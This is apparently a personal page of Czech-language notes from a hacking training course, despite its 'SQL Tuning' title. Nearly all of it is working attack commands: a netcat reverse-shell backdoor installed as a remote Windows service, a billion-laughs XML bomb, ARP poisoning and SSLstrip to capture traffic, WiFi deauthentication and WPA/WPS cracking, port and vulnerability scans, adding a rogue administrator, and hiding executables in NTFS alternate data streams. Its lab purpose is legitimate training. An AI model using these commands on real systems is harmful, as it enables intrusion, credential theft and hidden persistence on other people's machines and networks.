SQL Tuning

Poznamky ze skoleni GOC3

  • Backdoor

Vytvoreni backdooru
na stroji student926-12 posloucham na stroji 926-11 si vytvorim service ktera se ke me pripoji:


nc.exe -L -p 8081

sc \\student926-11 create backdoor binpath= srvany.exe
reg add student926-11HKLMSystemCurrentControlSetservicesbackdoorParameters /v Application /t REG_SZ /d "nc.exe student926-12 8081 -e cmd.exe"
sc \\student926-11 start backdoor 
  • Pretizeni XML parseru
<!DOCTYPE lolz [
 <!ENTITY lol "LoL">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>
   &lol9;
</lolz>
  • APR ve Windows = ARP Poisoning Routing = ca_setup_4.9.56 = Cain and Abel
    • V Cainu:
      • nastavit sitovku v menu Configure
      • zapnout sniffer
      • proskenovat sit pres tlacitko plus
      • kliknout na zalozku APR a pluskem vybrat mezi koho si chci stoupnout
      • zapneme radiaci
  • APR v linuxu (kali linux):
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.1 192.168.1.7 -r
  • SSL Strips v linuxu kali
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 
sslstrip -f -w ulovky.txt 
arpspoof -i eth0 -t 192.168.1.1 192.168.1.7 -r
    • Vytvoreni rainbow table pomoci Winrtgen
    • Wifi hacking 
      • wifi na linuxu - poslani odpojeni od site
        aireplay-ng --deauth 1 -a E8:94:F6:F7:53:D4 -c E8:DE:27:12:DC:B9 wlan0mon --ignore-negative-one
      • zachyceni komunikace do souboru
aircrack-ng swap-04.cap
      • nastaveni sitovky na konkretni kanal
airodump-ng wlan0mon --channel 11 -a --bssid E8:94:F6:F7:53:D4 --write swap
      • nastaveni sitovky do monitorovaciho modu
airmon-ng start wlan0
    • kontrola nastaveni wifi adapteru
      iwconfig
    • vytvoreni slovniku na konkretniho uzivatele (cupp)
      git clone https://github.com/Mebus/cupp.git
      cd cuppy
      python cupp.py -i
    • rozlousknuti klice pomoci slovniku a zachycene komunikace
      aircrack-ng -w cupp/roman.txt Cap-06.cap
    • Vyhledavani WPS
      wash -i wlan0mon
    • Prolomeni na WPS ktere jsme si nasli o krok vys
      reaver -i wlan0mon -b E8:94:F6:F7:53:D4 -v -d 10
  • prodlouzeni zkusebni doby u Win7
    slmgr.vbs -rearm


    napred si vymazeme arp tabulku. pak provedem oskenovani pingem celeho rozsahu, v arp tabulce mame udaje vsech aktivnich stroju v rozsahu
    arp -d
    FOR /L %i IN (1,1,254) DO @START /min cmd.exe /c PING -w 100 10.2.20.%i
    arp -a


    nmap
    nastroj na skenovani
    nmap -sn -n 10.0.0.1-254


    oskenovani urcitych portu
    FOR %i IN (25 53 80 110 135 139 445 8000 8080) DO START CMD /c NC 10.0.0.158 %i
    vypis otevrenych spojeni = otevrenych portu
    netstat -ano | findstr 10.0.0.158

    vypis otevrenych portu pres nmap
    nmap -sS 10.0.0.158 -n

    vypis uplne vsech otevrenych portu pres nmap
    nmap -sS 10.0.0.158 -n -p 1-65535


    detekce OS
    christmas scan
    nmap -O 10.0.0.158


    scanovani vulnerability nmapem
    (skripty jsou v podadresari scripts)
    c:\Program Files\Nmap\>nmap --script=*vuln* 10.0.0.158 -n


    metasploit - umozni nam vyuzit zranitelnost zjistenou v predchozim kroce

    pridai uzivatele do adminstratoru
    net localgroup administrators pepa /add


    ADS - alternativni datovy stream - ntfs - jak schovat info do souboru
    echo pokus > pokus.txt
    echo toto je tajny text > pokus.txt:tajny.txt
    notepad pokus.txt:tajny.txt
    type \WINDOWS\system32\calc.exe>pokus.txt:kalkulacka.exe
    start .\pokus.txt:kalkulacka.exe --funguje jen na WinXP

    rootkit
    hxdef100